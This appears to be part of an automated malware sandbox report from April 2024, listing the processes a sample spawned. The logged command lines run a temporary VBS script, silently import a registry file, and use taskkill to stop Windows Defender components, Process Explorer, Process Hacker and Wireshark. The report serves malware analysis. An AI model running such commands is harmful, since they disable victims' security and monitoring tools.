                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
                                                                                                                                                                                                                                  Imagebase:0xc90000
                                                                                                                                                                                                                                  File size:144'896 bytes
                                                                                                                                                                                                                                  MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                  Start time:07:01:59
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
                                                                                                                                                                                                                                  Imagebase:0x760000
                                                                                                                                                                                                                                  File size:43'520 bytes
                                                                                                                                                                                                                                  MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                  Start time:07:01:59
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                  Start time:07:01:59
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
                                                                                                                                                                                                                                  Imagebase:0x760000
                                                                                                                                                                                                                                  File size:43'520 bytes
                                                                                                                                                                                                                                  MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                  Start time:07:01:59
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                  Start time:07:02:10
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cmd.exe
                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                  Start time:07:02:10
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                  Start time:07:02:10
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM UserAccountControlSettings.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                  Start time:07:02:10
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                  Start time:07:02:10
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                  Start time:07:02:10
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                  Start time:07:02:10
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\regedit.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
                                                                                                                                                                                                                                  Imagebase:0x650000
                                                                                                                                                                                                                                  File size:329'728 bytes
                                                                                                                                                                                                                                  MD5 hash:BD63D72DB4FA96A1E0250B1D36B7A827
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                                  Start time:07:02:11
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM ProcessHacker.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                                                  Start time:07:02:11
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                                                  Start time:07:02:12
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM procexp.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                                                  Start time:07:02:12
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:40
                                                                                                                                                                                                                                  Start time:07:02:13
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM MSASCui.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                                                                  Start time:07:02:13
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                                                                  Start time:07:02:14
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM MsMpEng.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                                                                  Start time:07:02:14
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                                                  Start time:07:02:15
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM MpUXSrv.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                                                  Start time:07:02:15
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                                                  Start time:07:02:16
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM MpCmdRun.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                                                  Start time:07:02:16
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                                                                  Start time:07:02:16
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
                                                                                                                                                                                                                                  Imagebase:0xf90000
                                                                                                                                                                                                                                  File size:427'008 bytes
                                                                                                                                                                                                                                  MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:49
                                                                                                                                                                                                                                  Start time:07:02:16
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                                                  Start time:07:02:17
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM NisSrv.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                                                  Start time:07:02:17
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                                                                  Start time:07:02:18
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM ConfigSecurityPolicy.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                                                                  Start time:07:02:18
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                                                                  Start time:07:02:19
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM procexp.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:55
                                                                                                                                                                                                                                  Start time:07:02:19
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:57
                                                                                                                                                                                                                                  Start time:07:02:20
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM wireshark.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:58
                                                                                                                                                                                                                                  Start time:07:02:20
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:59
                                                                                                                                                                                                                                  Start time:07:02:21
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM tshark.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
